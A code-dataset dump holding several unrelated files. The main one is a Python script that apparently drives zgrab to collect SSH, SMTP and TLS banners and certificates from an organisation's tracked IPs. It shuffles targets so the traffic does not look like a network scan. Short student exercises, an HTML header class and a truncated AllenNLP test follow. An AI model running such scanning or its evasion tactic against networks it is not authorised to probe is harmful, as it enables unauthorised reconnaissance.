Zgrab works on IPs and MX records are typically domain names.
Therefore, we use the all_dns table to lookup up the IP address for the record.
"""
ips = set([])
ip_context = []
mx_results = all_dns_collection.find({'type': 'mx'})
for result in mx_results:
record = result['value']
if " " in result['value']:
parts = result['value'].split(" ")
record = parts[1]
if record.endswith("."):
record = record[:-1]
if zone_compare(record, zones) is not None:
ip_results = all_dns_collection.find({'fqdn': record})
for result in ip_results:
if result['type'] == 'a':
if not is_local_ip(result['value']):
ips.add(result['value'])
ip_context.append({'ip': result['value'], 'domain': result['fqdn'], 'source':'all_dns', 'zone': result['zone']})
elif result['type'] == 'cname':
if zone_compare(result['value'], zones):
second_results = all_dns_collection.find({'fqdn': result['value']})
for s_result in second_results:
if s_result['type'] == 'a':
if not is_local_ip(s_result['value']):
ips.add(s_result['value'])
ip_context.append({'ip': s_result['value'], 'domain': s_result['fqdn'], 'source':'all_dns', 'zone': s_result['zone']})
# Don't want to look like a network scan
# Set doesn't support random.shuffle
ips_list = list(ips)
random.shuffle(ips_list)
return (ips_list, ip_context)
def get_only_ipzones(ip_zones):
"""
Get the list of IPs from IP zones to limit the scans to data centers
"""
ips = set([])
ip_context = []
for ipz in ip_zones:
for ip in ipz:
if ip != ipz.network and ip != ipz.broadcast:
ips.add(str(ip))
# Don't want to look like a network scan
# Set doesn't support random.shuffle
ips_list = list(ips)
random.shuffle(ips_list)
return (ips_list, ip_context)
def get_ips(ip_zones, all_dns_collection):
"""
Get the list of all IPs that are being tracked by Marinus.
"""
ips = set([])
ip_context = []
domain_results = all_dns_collection.find({'type': 'a'})
for result in domain_results:
if not is_local_ip(result['value']):
ips.add(result['value'])
ip_context.append({'ip': result['value'], 'domain': result['fqdn'], 'source': 'all_dns', 'zone': result['zone']})
for ipz in ip_zones:
for ip in ipz:
if ip != ipz.network and ip != ipz.broadcast:
ips.add(str(ip))
# Don't want to look like a network scan
# Set doesn't support random.shuffle
ips_list = list(ips)
random.shuffle(ips_list)
return (ips_list, ip_context)
def check_ip_context(ip, ip_context):
"""
Check for matching ip_context records
"""
matches = []
for entry in ip_context:
if entry['ip'] == ip:
matches.append(entry)
return matches
def zone_compare(value, zones):
"""
Determines whether value is in a known zone
"""
for zone in zones:
if value.endswith("." + zone) or value == zone:
return zone
return None
def check_in_zone(entry, zones):
"""
Obtain the DNS names from the common_name and dns_zones from the entry's SSL certificate.
Determine if the entry's DNS names is in the list of provided zones.
Return the matched zone.
"""
try:
certificate = entry['server_certificates']['certificate']
except:
return []
try:
temp1 = certificate["parsed"]["subject"]["common_name"]
except KeyError:
temp1 = []
try:
temp2 = certificate["parsed"]["extensions"]["subject_alt_name"]["dns_names"]
except KeyError:
temp2 = []
cert_zones = []
value_array = temp1 + temp2
for value in value_array:
zone = zone_compare(value, zones)
if zone is not None and zone not in cert_zones:
cert_zones.append(zone)
return cert_zones
def insert_result(entry, port, ip_context, all_zones, results_collection):
"""
Insert the matched domain into the collection of positive results.
"""
if 'zgrab2' in global_zgrab_path:
temp_date = entry['data'][global_port_names[port]]['timestamp']
new_date = parse(temp_date)
entry["timestamp"] = new_date
entry['data'][global_port_names[port]]['timestamp'] = new_date
else:
temp_date = entry["timestamp"]
new_date = parse(temp_date)
entry["timestamp"] = new_date
# Returns all entries in ip_context that contain the given IP
matches = check_ip_context(entry['ip'], ip_context)
# Grab the zones from the ip_context
zones = []
domains = []
if len(matches) > 0:
for match in matches:
if match['zone'] not in zones:
zones.append(match['zone'])
if match['domain'] not in domains:
domains.append(match['domain'])
# Append the zones from the TLS certificate
if port == "443":
# Make the timestamp an actual date instead of a string
entry['data']['tls']['timestamp'] = new_date
if 'zgrab2' in global_zgrab_path:
cert_zones = check_in_zone(entry['data']['tls']['result']['handshake_log'], all_zones)
else:
cert_zones = check_in_zone(entry['data']['tls'], all_zones)
for zone in cert_zones:
if zone not in zones:
zones.append(zone)
elif port == "22":
if 'zgrab2' in global_zgrab_path:
entry['data']['ssh']['timestamp'] = new_date
else:
entry['data']['xssh']['timestamp'] = new_date
elif port == "25":
if 'zgrab2' in global_zgrab_path:
if 'tls' in entry['data']['smtp']['result']:
cert_zones = check_in_zone(entry['data']['smtp']['result']['tls']['handshake_log'], all_zones)
for zone in cert_zones:
if zone not in zones:
zones.append(zone)
else:
temp = entry['data']
entry['data'] = {}
entry['data']['smtp'] = temp
entry['data']['smtp']['timestamp'] = new_date
if 'tls' in entry['data']['smtp']:
cert_zones = check_in_zone(entry['data']['smtp']['tls']['response'], all_zones)
for zone in cert_zones:
if zone not in zones:
zones.append(zone)
elif port == "465":
temp = entry['data'].pop('smtp')
entry['data']['smtps'] = temp
if 'zgrab2' in global_zgrab_path:
if 'tls' in entry['data']['smtps']['result']:
cert_zones = check_in_zone(entry['data']['smtps']['result']['tls']['handshake_log'], all_zones)
for zone in cert_zones:
if zone not in zones:
zones.append(zone)
else:
temp = entry['data']
entry['data'] = {}
entry['data']['smtps'] = temp
entry['data']['smtps']['timestamp'] = new_date
if 'tls' in entry['data']['smtps']:
cert_zones = check_in_zone(entry['data']['smtps']['tls'], all_zones)
for zone in cert_zones:
if zone not in zones:
zones.append(zone)
entry['zones'] = zones
entry['domains'] = domains
exists = results_collection.find({"ip": entry['ip']}).count()
if exists == 0:
results_collection.insert(entry)
elif port == "443":
results_collection.update({"ip": entry['ip']}, {"$set": {"data.tls": entry['data']['tls'], 'timestamp': entry['timestamp']}})
elif port == "22":
if 'zgrab2' in global_zgrab_path:
results_collection.update({"ip": entry['ip']}, {"$set": {"data.ssh": entry['data']['ssh'], 'timestamp': entry['timestamp']}})
else:
results_collection.update({"ip": entry['ip']}, {"$set": {"data.xssh": entry['data']['xssh'], 'timestamp': entry['timestamp']}})
elif port == "25":
results_collection.update({"ip": entry['ip']}, {"$set": {"data.smtp": entry['data']['smtp'], 'timestamp': entry['timestamp']}})
elif port == "465":
results_collection.update({"ip": entry['ip']}, {"$set": {"data.smtps": entry['data']['smtps'], 'timestamp': entry['timestamp']}})
def run_port_22_command(target_list, tnum):
"""
Use Zgrab to make an SSH connection
"""
if global_sleep_time > 0:
time.sleep(global_sleep_time)
targets = ""
for ip in target_list:
targets = targets + ip + "\\n"
targets = targets[:-2]
p1 = subprocess.Popen(["echo", "-e", targets], stdout=subprocess.PIPE)
if 'zgrab2' in global_zgrab_path:
p2 = subprocess.Popen([global_zgrab_path, "ssh", "--port=22", "--verbose", "--timeout=30", "--output-file=./json_p22/p22-" + str(tnum) + ".json"], stdin=p1.stdout, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
p1.stdout.close()
output, _ = p2.communicate()
parts = _.decode("utf-8").split("\n")
for entry in parts:
if entry.startswith("{"):
json_output = json.loads(entry)
return json_output
return json.loads("{}")
else:
p2 = subprocess.Popen([global_zgrab_path, "--port=22", "--xssh", "--xssh-verbose", "-banners", "--timeout=30", "--output-file=./json_p22/p22-" + str(tnum) + ".json"], stdin=p1.stdout, stdout=subprocess.PIPE)
p1.stdout.close()
output, _ = p2.communicate()
json_output = json.loads(output.decode("utf-8"))
return json_output
def run_port_25_command(target_list, tnum):
"""
Use Zgrab to attempt an SMTP connection with StartTLS
"""
if global_sleep_time > 0:
time.sleep(global_sleep_time)
targets = ""
for ip in target_list:
targets = targets + ip + "\\n"
targets = targets[:-2]
p1 = subprocess.Popen(["echo", "-e", targets], stdout=subprocess.PIPE)
if 'zgrab2' in global_zgrab_path:
p2 = subprocess.Popen([global_zgrab_path, "smtp", "--port=25", "--starttls", "--timeout=30", "--output-file=./json_p25/p25-" + str(tnum) + ".json"], stdin=p1.stdout, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
p1.stdout.close()
output, _ = p2.communicate()
parts = _.decode("utf-8").split("\n")
for entry in parts:
if entry.startswith("{"):
json_output = json.loads(entry)
return json_output
return json.loads("{}")
else:
p2 = subprocess.Popen([global_zgrab_path, "--port=25", "--smtp", "--starttls", "--banners", "--timeout=30", "--output-file=./json_p25/p25-" + str(tnum) + ".json"], stdin=p1.stdout, stdout=subprocess.PIPE)
p1.stdout.close()
output, _ = p2.communicate()
json_output = json.loads(output.decode("utf-8"))
return json_output
def run_port_25_no_tls_command(target_list, tnum):
"""
Use Zgrab to attempt an connection on port 25 without using StartTLS
"""
if global_sleep_time > 0:
time.sleep(global_sleep_time)
targets = ""
for ip in target_list:
targets = targets + ip + "\\n"
targets = targets[:-2]
p1 = subprocess.Popen(["echo", "-e", targets], stdout=subprocess.PIPE)
if 'zgrab2' in global_zgrab_path:
p2 = subprocess.Popen([global_zgrab_path, "smtp", "--port=25", "--timeout=30", "--output-file=./json_p25/p25-" + str(tnum) + ".json"], stdin=p1.stdout, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
p1.stdout.close()
output, _ = p2.communicate()
parts = _.decode("utf-8").split("\n")
for entry in parts:
if entry.startswith("{"):
json_output = json.loads(entry)
return json_output
return json.loads("{}")
else:
p2 = subprocess.Popen([global_zgrab_path, "--port=25", "--smtp", "--banners", "--timeout=30", "--output-file=./json_p25/p25-" + str(tnum) + ".json"], stdin=p1.stdout, stdout=subprocess.PIPE)
p1.stdout.close()
output, _ = p2.communicate()
json_output = json.loads(output.decode("utf-8"))
return json_output
def run_port_443_command(target_list, tnum):
"""
Use ZGrab to do a simple HTTPS connection.
None of the fancier HTTP connection options are used (e.g. follow redirects)
"""
if global_sleep_time > 0:
time.sleep(global_sleep_time)
targets = ""
for ip in target_list:
targets = targets + ip + "\\n"
targets = targets[:-2]
p1 = subprocess.Popen(["echo", "-e", targets], stdout=subprocess.PIPE)
if 'zgrab2' in global_zgrab_path:
p2 = subprocess.Popen([global_zgrab_path, "tls", "--port=443", "--timeout=30", "--output-file=./json_p443/p443-" + str(tnum) + ".json"], stdin=p1.stdout, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
p1.stdout.close()
output, _ = p2.communicate()
parts = _.decode("utf-8").split("\n")
for entry in parts:
if entry.startswith("{"):
json_output = json.loads(entry)
return json_output
return json.loads("{}")
else:
p2 = subprocess.Popen([global_zgrab_path, "--port=443", "--tls", "--chrome-ciphers", "--timeout=30", "--output-file=./json_p443/p443-" + str(tnum) + ".json"], stdin=p1.stdout, stdout=subprocess.PIPE)
p1.stdout.close()
output, _ = p2.communicate()
json_output = json.loads(output.decode("utf-8"))
return json_output
def run_port_465_command(target_list, tnum):
"""
Use ZGrab to test for SMTPS on port 465
"""
if global_sleep_time > 0:
time.sleep(global_sleep_time)
targets = ""
for ip in target_list:
targets = targets + ip + "\\n"
targets = targets[:-2]
p1 = subprocess.Popen(["echo", "-e", targets], stdout=subprocess.PIPE)
if 'zgrab2' in global_zgrab_path:
p2 = subprocess.Popen([global_zgrab_path, "smtp", "--port=465", "--smtps", "--timeout=30", "--output-file=./json_p465/p465-" + str(tnum) + ".json"], stdin=p1.stdout, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
p1.stdout.close()
output, _ = p2.communicate()
parts = _.decode("utf-8").split("\n")
for entry in parts:
if entry.startswith("{"):
json_output = json.loads(entry)
return json_output
return json.loads("{}")
else:
p2 = subprocess.Popen([global_zgrab_path, "--port=465", "--smtp", "--tls", "--banners", "--timeout=30", "--output-file=./json_p465/p465-" + str(tnum) + ".json"], stdin=p1.stdout, stdout=subprocess.PIPE)
p1.stdout.close()
output, _ = p2.communicate()
json_output = json.loads(output.decode("utf-8"))
return json_output
def process_thread(ips, port, run_command, zones_struct, zgrab_collection, tnum):
"""
Runs zgrab and stores the result if necessary
"""
json_output = run_command(ips, tnum)
if ('success_count' in json_output and json_output['success_count'] > 0) or \
('statuses' in json_output and json_output['statuses'][global_port_names[port]]['successes'] > 0):
result_file = open("./json_p" + port + "/p" + port + "-" + str(tnum) + ".json", "r")
results=[]
for result in result_file:
results.append(json.loads(result))
result_file.close()
for result in results:
if ('zgrab2' in global_zgrab_path and "error" in result['data'][global_port_names[port]]) or \
'error' in result:
if port == "25":
if ('zgrab2' in global_zgrab_path and 'result' in result['data']['smtp'] and 'starttls' in result['data']['smtp']['result']) or \
"error_component" in result and result['error_component'] == "starttls":
print("Adding " + str(result['ip']) + " to retest list")
global_retest_list.append(result['ip'])
else:
print("Failed " + port + ": " + str(result['ip']))
else:
print("Failed " + port + ": " + str(result['ip']))
else:
result['aws'] = is_aws_ip(result['ip'], zones_struct['aws_ips'])
result['azure'] = is_azure_ip(result['ip'], zones_struct['azure_ips'])
result['tracked'] = is_tracked_ip(result['ip'], zones_struct['ip_zones'])
insert_result(result, port, zones_struct['ip_context'], zones_struct['zones'], zgrab_collection)
print("Inserted " + port + ": " + result['ip'])
else:
print("Failed " + port + ": " + str(ips))
def process_data(tnum, q, port, command, zones_struct, zgrab_collection):
"""
Does the per-thread getting of a value, running the sub-function, and marking a completion.
None of the global variables are assigned locally in order to ensure a global reference.
"""
while not global_exit_flag:
global_queue_lock.acquire()
if not global_work_queue.empty():
data = []
i = 0
while i < global_queue_size:
data.append(q.get())
i = i + 1
if global_work_queue.empty():
break
global_queue_lock.release()
print ("Thread %s processing %s" % (str(tnum), data))
try:
process_thread(data, port, command, zones_struct, zgrab_collection, tnum)
except Exception as ex:
print("Thread error processing: " + str(data))
print(str(ex))
for _ in range(0,i):
q.task_done()
else:
global_queue_lock.release()
time.sleep(1)
class ZgrabThread (threading.Thread):
"""
The thread class which stores the constants for each thread.
"""
def __init__(self, thread_id, q, port, command, zones_struct, zgrab_collection):
threading.Thread.__init__(self)
self.thread_id = thread_id
self.port = port
self.zones_struct = zones_struct
self.zgrab_collection = zgrab_collection
self.run_command = command
self.q = q
def run(self):
print ("Starting Thread-" + str(self.thread_id))
process_data(self.thread_id, self.q, self.port, self.run_command, self.zones_struct, self.zgrab_collection)
print ("Exiting Thread-" + str(self.thread_id))
def check_save_location(save_location):
"""
Check to see if the directory exists.
If the directory does not exist, it will automatically create it.
"""
if not os.path.exists(save_location):
os.makedirs(save_location)
def main():
global global_exit_flag
global global_retest_list
global global_sleep_time
global global_queue_size
global global_zgrab_path
global_retest_list = []
parser = argparse.ArgumentParser(description='Launch zgrab against IPs using port 22, 25, 443, or 465.')
parser.add_argument('-p', choices=['443','22', '25', '465'], metavar="port", help='The port to scan: 22, 25, 443, or 465')
parser.add_argument('-t', default=5, type=int, metavar="threadCount", help='The number of threads')
parser.add_argument('--mx', action="store_true", help='Scan only IPs from MX records. Useful for SMTP scans.')
parser.add_argument('-s', default=0, type=int, metavar="sleepTime", help='Sleep time in order to spread out the batches')
parser.add_argument('--qs', default=0, type=int, metavar="queueSize", help='How many hosts to scan in a batch')
parser.add_argument('--zones_only', action="store_true", help='Scan only IPs from IP zones.')
parser.add_argument('--zgrab_path', default=global_zgrab_path, metavar='zgrabVersion', help='The version of ZGrab to use')
args = parser.parse_args()
if args.p == None:
print("A port value (22, 25, 443, or 465) must be provided.")
exit(0)
if is_running(os.path.basename(__file__)):
"""
Check to see if a previous attempt to parse is still running...
"""
now = datetime.now()
print(str(now) + ": I am already running! Goodbye!")
exit(0)
now = datetime.now()
print("Starting: " + str(now))
rm_connector = RemoteMongoConnector.RemoteMongoConnector()
all_dns_collection = rm_connector.get_all_dns_connection()
jobs_manager = JobsManager.JobsManager(rm_connector, "zgrab_port_ip-" + args.p)
jobs_manager.record_job_start()
zones_struct = {}
zones_struct['zones'] = ZoneManager.get_distinct_zones(rm_connector)
zones_struct['ip_zones'] = get_ip_zones(rm_connector)
# Collect the list of AWS CIDRs
zones_struct['aws_ips'] = get_aws_ips(rm_connector)
# Collect the list of Azure CIDRs
zones_struct['azure_ips'] = get_azure_ips(rm_connector)
if args.mx:
(ips, ip_context) = get_mx_ips(zones_struct['zones'], all_dns_collection)
elif args.zones_only:
(ips, ip_context) = get_only_ipzones(zones_struct['ip_zones'])
else:
(ips, ip_context) = get_ips(zones_struct['ip_zones'], all_dns_collection)
if args.s and int(args.s) > 0:
global_sleep_time = int(args.s)
if args.qs and int(args.qs) > 0:
global_queue_size = int(args.qs)
print("Got IPs: " + str(len(ips)))
zones_struct['ip_context'] = ip_context
zgrab_collection = rm_connector.get_zgrab_port_data_connection()
if args.p == "443":
run_command = run_port_443_command
elif args.p == "22":
run_command = run_port_22_command
elif args.p == "25":
run_command = run_port_25_command
elif args.p == "465":
run_command = run_port_465_command
check_save_location("./json_p" + args.p)
global_zgrab_path = args.zgrab_path
threads = []
print ("Creating " + str(args.t) + " threads")
for thread_id in range (1, args.t + 1):
thread = ZgrabThread(thread_id, global_work_queue, args.p, run_command, zones_struct, zgrab_collection)
thread.start()
threads.append(thread)
thread_id += 1
print("Populating Queue")
global_queue_lock.acquire()
for ip in ips:
global_work_queue.put(ip)
global_queue_lock.release()
# Wait for queue to empty
while not global_work_queue.empty():
pass
# Notify threads it's time to exit
global_exit_flag = 1
# Wait for all threads to complete
for t in threads:
t.join()
print ("Exiting Main Thread")
print("Global retest list: " + str(len(global_retest_list)))
# Retest any SMTP hosts that did not respond to the StartTLS handshake
if args.p == "25" and len(global_retest_list) > 0:
process_thread(global_retest_list, args.p, run_port_25_no_tls_command, zones_struct, zgrab_collection, "retest")
# Remove old entries from before the scan
if args.p == "443":
other_results = zgrab_collection.find({'data.tls': {"$exists": True}, 'data.tls.timestamp': {"$lt": now}})
for result in other_results:
zgrab_collection.update_one({"_id": ObjectId(result['_id'])}, {"$unset": {'data.tls': ""}})
elif args.p == "22":
if 'zgrab2' in global_zgrab_path:
other_results = zgrab_collection.find({'data.ssh': {"$exists": True}, 'data.ssh.timestamp': {"$lt": now}})
for result in other_results:
zgrab_collection.update_one({"_id": ObjectId(result['_id'])}, {"$unset": {'data.ssh': ""}})
else:
other_results = zgrab_collection.find({'data.xssh': {"$exists": True}, 'data.xssh.timestamp': {"$lt": now}})
for result in other_results:
zgrab_collection.update_one({"_id": ObjectId(result['_id'])}, {"$unset": {'data.xssh': ""}})
elif args.p == "25":
other_results = zgrab_collection.find({'data.smtp': {"$exists": True}, 'data.smtp.timestamp': {"$lt": now}})
for result in other_results:
zgrab_collection.update_one({"_id": ObjectId(result['_id'])}, {"$unset": {'data.smtp': ""}})
elif args.p == "465":
other_results = zgrab_collection.find({'data.smtps': {"$exists": True}, 'data.smtps.timestamp': {"$lt": now}})
for result in other_results:
zgrab_collection.update_one({"_id": ObjectId(result['_id'])}, {"$unset": {'data.smtps': ""}})
# Remove any completely empty entries
zgrab_collection.remove({'data': {}})
jobs_manager.record_job_complete()
now = datetime.now()
print("Complete: " + str(now))
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
b4e15b33e55d23e30e8e2f6b8a321eafb8f54723 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/309/usersdata/293/73227/submittedfiles/atm.py | 2c93c82af2e85472309450b343bbc2b08ab565f8 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 267 | py | # -*- coding: utf-8 -*-
from __future__ import division
import math
money=int(input("Digite um valor: "))
r1=money%20
r2=r1%10
r3=r2%5
r4=r3%2
d1=money//20
d2=r1//10
d3=r2//5
d4=r3//2
d5=r4//1
if money<0:
print("Valor inválido")
else:
print(str(d1)+str(d2)) | [
"[email protected]"
] | |
604bca4b8f0b2686a9201ccb1c91a2fd818f3ee0 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02836/s667985812.py | 1658fec98933a591e5a14d44dd868cbef7443c97 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 379 | py | S = input()
leng = len(S)
count = 0
if leng % 2 == 0:
S1 = S[:int(leng/2)]
S2 = S[int(leng/2):]
for i in range(int(leng/2)):
if S1[i] == S2[int(leng/2)-1-i]:
count += 1
print(int(leng/2)-count)
else:
S1 = S[:int(leng/2)]
S2 = S[int(leng/2)+1:]
for i in range(int(leng/2)):
if S1[i] == S2[int(leng/2)-1-i]:
count += 1
print(int(leng/2)-count)
| [
"[email protected]"
] | |
af2f0512e91ea49f71983aa68b1076a656ccefd2 | 090d43fb627fd1d91bb3d745f008485f15f8f189 | /wotw_highlighter/block_header.py | be74c109bcd8bee32e87936500abd1df1f77b06e | [
"ISC"
] | permissive | wizardsoftheweb/wotw-highlighter | 6153ebc50d574d963b060393591c76c44c13ba4c | f9c2c91f5ebc506192e81573942b4989c80ae2bb | refs/heads/master | 2021-04-25T11:24:12.816987 | 2018-02-24T23:21:16 | 2018-02-24T23:21:16 | 111,818,711 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,623 | py | """This file provides a class to attach a header to a block"""
from wotw_highlighter.block_options import BlockOptions
class BlockHeader(BlockOptions):
"""This class compiles and renders a block's header (if any)"""
RENDER_AN_OPTION_NOT_INCLUDED = ''
ERROR_NEED_blob_path_OR_TITLE = ValueError('''\
blob_path and alternate_title cannot both be empty when generating a header\
''')
def validate(self):
"""Overrides super validate"""
if self.blob_path is None and self.title is None:
raise self.ERROR_NEED_blob_path_OR_TITLE
@staticmethod
def construct_code_tab(contents, active=False):
"""
This convenience method wraps contents in the proper markup
Parameters:
contents: The contents of the tab
active: Whether or not the tab should be marked as active
"""
return (
'<div class="code-tab%s">'
'%s'
'</div>'
% (
(
' active'
if active
else ''
),
contents
)
)
def render_git_ref_name_tab(self):
"""Renders the VCS branch tab"""
if self.git_ref_name and 'HEAD' != self.git_ref_name:
return self.construct_code_tab(self.git_ref_name)
return self.RENDER_AN_OPTION_NOT_INCLUDED
def render_title_tab(self):
"""Renders the blob title"""
title = (
self.title
if self.title
else self.blob_path
)
return self.construct_code_tab(title, True)
def render_external_source_link_tab(self):
"""Renders the VCS link tab"""
if self.external_source_link:
tab_body = (
'<a target="_blank" href="%s">'
'view source <i class="fa fa-external-link"></i>'
'</a>'
% (self.external_source_link)
)
return self.construct_code_tab(tab_body)
return self.RENDER_AN_OPTION_NOT_INCLUDED
def render_full_header(self):
"""Renders the entire header row"""
return (
'<tr class="code-header">'
'<td></td>'
'<td class="code-header">'
'%s'
'%s'
'%s'
'</td>'
'</tr>'
% (
self.render_title_tab(),
self.render_git_ref_name_tab(),
self.render_external_source_link_tab()
)
)
def __str__(self):
return self.render_full_header()
| [
"[email protected]"
] | |
e4f9dcf65fe4ea8720044f55226e52e8eaf389c0 | bfe3973571b066865d451fb7276b73158c4bd889 | /code/AllenNLP_Modifications/allennlp_velmo30k/allennlp/tests/data/fields/text_field_test.py | faa5fabde756cecc6439ccda8abda64903c5200d | [
"Apache-2.0"
] | permissive | UKPLab/naacl2019-like-humans-visual-attacks | 85dd11f13ac57e1a0a2e5e7f4161f3e6588fb0ed | 0d4eb57c239125c0d7e0e827a9887e182f3deebd | refs/heads/master | 2022-12-05T06:36:53.994158 | 2021-02-08T08:51:57 | 2021-02-08T08:51:57 | 174,987,605 | 26 | 6 | Apache-2.0 | 2022-11-21T20:49:09 | 2019-03-11T11:38:48 | Python | UTF-8 | Python | false | false | 13,954 | py | # pylint: disable=no-self-use,invalid-name
from collections import defaultdict
from typing import Dict, List
import pytest
import numpy
from allennlp.data import Token, Vocabulary
from allennlp.data.fields import TextField
from allennlp.data.token_indexers import SingleIdTokenIndexer, TokenCharactersIndexer, TokenIndexer
from allennlp.common.testing import AllenNlpTestCase
from allennlp.common.checks import ConfigurationError
from allennlp.common.util import pad_sequence_to_length
class DictReturningTokenIndexer(TokenIndexer):
"""
A stub TokenIndexer that returns multiple arrays of different lengths.
"""
def count_vocab_items(self, token: Token, counter: Dict[str, Dict[str, int]]):
pass
def tokens_to_indices(self, tokens: List[Token],
vocabulary: Vocabulary,
index_name: str) -> Dict[str, List[int]]: # pylint: disable=unused-argument
return {
"token_ids": [10, 15] + \
[vocabulary.get_token_index(token.text, 'words') for token in tokens] + \
[25],
"additional_key": [22, 29]
}
def get_padding_token(self) -> int:
return 0
def get_padding_lengths(self, token: int) -> Dict[str, int]: # pylint: disable=unused-argument
return {}
def pad_token_sequence(self,
tokens: Dict[str, List[int]],
desired_num_tokens: Dict[str, int],
padding_lengths: Dict[str, int]) -> Dict[str, List[int]]: # pylint: disable=unused-argument
return {key: pad_sequence_to_length(val, desired_num_tokens[key]) for key, val in tokens.items()}
def get_keys(self, index_name: str) -> List[str]:
# pylint: disable=unused-argument,no-self-use
return ["token_ids", "additional_key"]
class TestTextField(AllenNlpTestCase):
def setUp(self):
self.vocab = Vocabulary()
self.vocab.add_token_to_namespace("sentence", namespace='words')
self.vocab.add_token_to_namespace("A", namespace='words')
self.vocab.add_token_to_namespace("A", namespace='characters')
self.vocab.add_token_to_namespace("s", namespace='characters')
self.vocab.add_token_to_namespace("e", namespace='characters')
self.vocab.add_token_to_namespace("n", namespace='characters')
self.vocab.add_token_to_namespace("t", namespace='characters')
self.vocab.add_token_to_namespace("c", namespace='characters')
super(TestTextField, self).setUp()
def test_field_counts_vocab_items_correctly(self):
field = TextField([Token(t) for t in ["This", "is", "a", "sentence", "."]],
token_indexers={"words": SingleIdTokenIndexer("words")})
namespace_token_counts = defaultdict(lambda: defaultdict(int))
field.count_vocab_items(namespace_token_counts)
assert namespace_token_counts["words"]["This"] == 1
assert namespace_token_counts["words"]["is"] == 1
assert namespace_token_counts["words"]["a"] == 1
assert namespace_token_counts["words"]["sentence"] == 1
assert namespace_token_counts["words"]["."] == 1
assert list(namespace_token_counts.keys()) == ["words"]
field = TextField([Token(t) for t in ["This", "is", "a", "sentence", "."]],
token_indexers={"characters": TokenCharactersIndexer("characters")})
namespace_token_counts = defaultdict(lambda: defaultdict(int))
field.count_vocab_items(namespace_token_counts)
assert namespace_token_counts["characters"]["T"] == 1
assert namespace_token_counts["characters"]["h"] == 1
assert namespace_token_counts["characters"]["i"] == 2
assert namespace_token_counts["characters"]["s"] == 3
assert namespace_token_counts["characters"]["a"] == 1
assert namespace_token_counts["characters"]["e"] == 3
assert namespace_token_counts["characters"]["n"] == 2
assert namespace_token_counts["characters"]["t"] == 1
assert namespace_token_counts["characters"]["c"] == 1
assert namespace_token_counts["characters"]["."] == 1
assert list(namespace_token_counts.keys()) == ["characters"]
field = TextField([Token(t) for t in ["This", "is", "a", "sentence", "."]],
token_indexers={"words": SingleIdTokenIndexer("words"),
"characters": TokenCharactersIndexer("characters")})
namespace_token_counts = defaultdict(lambda: defaultdict(int))
field.count_vocab_items(namespace_token_counts)
assert namespace_token_counts["characters"]["T"] == 1
assert namespace_token_counts["characters"]["h"] == 1
assert namespace_token_counts["characters"]["i"] == 2
assert namespace_token_counts["characters"]["s"] == 3
assert namespace_token_counts["characters"]["a"] == 1
assert namespace_token_counts["characters"]["e"] == 3
assert namespace_token_counts["characters"]["n"] == 2
assert namespace_token_counts["characters"]["t"] == 1
assert namespace_token_counts["characters"]["c"] == 1
assert namespace_token_counts["characters"]["."] == 1
assert namespace_token_counts["words"]["This"] == 1
assert namespace_token_counts["words"]["is"] == 1
assert namespace_token_counts["words"]["a"] == 1
assert namespace_token_counts["words"]["sentence"] == 1
assert namespace_token_counts["words"]["."] == 1
assert set(namespace_token_counts.keys()) == {"words", "characters"}
def test_index_converts_field_correctly(self):
vocab = Vocabulary()
sentence_index = vocab.add_token_to_namespace("sentence", namespace='words')
capital_a_index = vocab.add_token_to_namespace("A", namespace='words')
capital_a_char_index = vocab.add_token_to_namespace("A", namespace='characters')
s_index = vocab.add_token_to_namespace("s", namespace='characters')
e_index = vocab.add_token_to_namespace("e", namespace='characters')
n_index = vocab.add_token_to_namespace("n", namespace='characters')
t_index = vocab.add_token_to_namespace("t", namespace='characters')
c_index = vocab.add_token_to_namespace("c", namespace='characters')
field = TextField([Token(t) for t in ["A", "sentence"]],
{"words": SingleIdTokenIndexer(namespace="words")})
field.index(vocab)
# pylint: disable=protected-access
assert field._indexed_tokens["words"] == [capital_a_index, sentence_index]
field1 = TextField([Token(t) for t in ["A", "sentence"]],
{"characters": TokenCharactersIndexer(namespace="characters")})
field1.index(vocab)
assert field1._indexed_tokens["characters"] == [[capital_a_char_index],
[s_index, e_index, n_index, t_index,
e_index, n_index, c_index, e_index]]
field2 = TextField([Token(t) for t in ["A", "sentence"]],
token_indexers={"words": SingleIdTokenIndexer(namespace="words"),
"characters": TokenCharactersIndexer(namespace="characters")})
field2.index(vocab)
assert field2._indexed_tokens["words"] == [capital_a_index, sentence_index]
assert field2._indexed_tokens["characters"] == [[capital_a_char_index],
[s_index, e_index, n_index, t_index,
e_index, n_index, c_index, e_index]]
# pylint: enable=protected-access
def test_get_padding_lengths_raises_if_no_indexed_tokens(self):
field = TextField([Token(t) for t in ["This", "is", "a", "sentence", "."]],
token_indexers={"words": SingleIdTokenIndexer("words")})
with pytest.raises(ConfigurationError):
field.get_padding_lengths()
def test_padding_lengths_are_computed_correctly(self):
field = TextField([Token(t) for t in ["This", "is", "a", "sentence", "."]],
token_indexers={"words": SingleIdTokenIndexer("words")})
field.index(self.vocab)
padding_lengths = field.get_padding_lengths()
assert padding_lengths == {"num_tokens": 5}
field = TextField([Token(t) for t in ["This", "is", "a", "sentence", "."]],
token_indexers={"characters": TokenCharactersIndexer("characters")})
field.index(self.vocab)
padding_lengths = field.get_padding_lengths()
assert padding_lengths == {"num_tokens": 5, "num_token_characters": 8}
field = TextField([Token(t) for t in ["This", "is", "a", "sentence", "."]],
token_indexers={"characters": TokenCharactersIndexer("characters"),
